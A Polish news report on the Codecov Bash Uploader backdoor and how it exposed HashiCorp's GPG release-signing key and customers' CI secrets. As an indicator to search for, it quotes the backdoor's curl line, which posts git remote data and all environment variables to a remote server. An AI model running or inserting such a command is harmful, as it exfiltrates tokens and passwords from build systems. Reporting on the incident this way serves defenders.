Wprowadzenie złośliwego kodu do skryptu Codecov doprowadziło do kompromitacji klucza PGP HashiCorp

Firma HashiCorp, znana z rozwijania otwartych narzędzi takich jak Vagrant, Packer, Nomad i Terraform, ogłosiła wyciek poufnego klucza GPG, używanego do tworzenia podpisów cyfrowych, które weryfikują wydania. Napastnicy, którzy uzyskali dostęp do klucza GPG, mogli potencjalnie wprowadzić ukryte zmiany w produktach HashiCorp, zatwierdzając je poprawnym podpisem cyfrowym. Firma oświadczyła, że w trakcie przeprowadzonego audytu nie wykryto żadnych śladów prób wprowadzenia takich modyfikacji.

Obecnie skompromitowany klucz GPG został odwołany, a zamiast niego wprowadzono nowy klucz. Problem dotyczył jedynie weryfikacji za pomocą plików SHA256SUM i SHA256SUM.sig, i nie miał wpływu na tworzenie podpisów cyfrowych dla pakietów Linux DEB i RPM, dostarczanych przez releases.hashicorp.com, ani na mechanizmy potwierdzania wydań dla macOS i Windows (AuthentiCode).

Wyciek wystąpił z powodu użycia w infrastrukturze skryptu Codecov Bash Uploader (codecov-bash), który był przeznaczony do przesyłania raportów pokrycia z systemów ciągłej integracji. W trakcie ataku na firmę Codecov, do wskazanego skryptu został potajemnie wprowadzony backdoor, przez który zorganizowano wysyłkę haseł i kluczy szyfrujących na serwer serwer atakujących.

Aby przeprowadzić włamanie, napastnicy wykorzystali błąd w procesie tworzenia obrazu Docker Codecov, który umożliwiał wydobycie danych dostępowych do GCS (Google Cloud Storage), niezbędnych do wprowadzenia zmian w skrypcie Bash Uploader, rozpowszechnianym z witryny codecov.io. Zmiany zostały wprowadzone jeszcze 31 stycznia, przez dwa miesiące pozostały niezauważone, co pozwoliło przestępcom na wyciąganie informacji przechowywanych w środowiskach systemów ciągłej integracji klientów. Dzięki dodanemu złośliwemu kodowi napastnicy mogli uzyskać informacje o testowanym repozytorium Git i wszystkich zmiennych środowiskowych, w tym o tokenach, kluczy szyfrujących i hasłach, które były przekazywane do systemów ciągłej integracji w celu zapewnienia dostępu do kodu aplikacji, magazynów i usług, takich jak Amazon Web Services i GitHub.

Oprócz bezpośredniego wywołania, skrypt Codecov Bash Uploader był używany w składzie innych uploaderów, takich jak Codecov-action (Github), Codecov-circleci-orb i Codecov-bitrise-step, których użytkownicy również są narażeni na ten problem. Wszystkim użytkownikom codecov-bash i powiązanych produktów zaleca się audyt swojej infrastruktury oraz zmianę haseł i kluczy szyfrujących. Sprawdzenie obecności backdoora w skrypcie można zrealizować, szukając w nim ciągu curl -sm 0.5 -d "$(git remote -v)<<<< ENV $(env)" http:///upload/v2 || true

Źródło: opennet.ru

Kup solidny hosting stron z ochroną przed DDoS, serwery VPS VDS 🔥 Kup solidny hosting stron z ochroną przed DDoS, serwery VPS VDS | ProHoster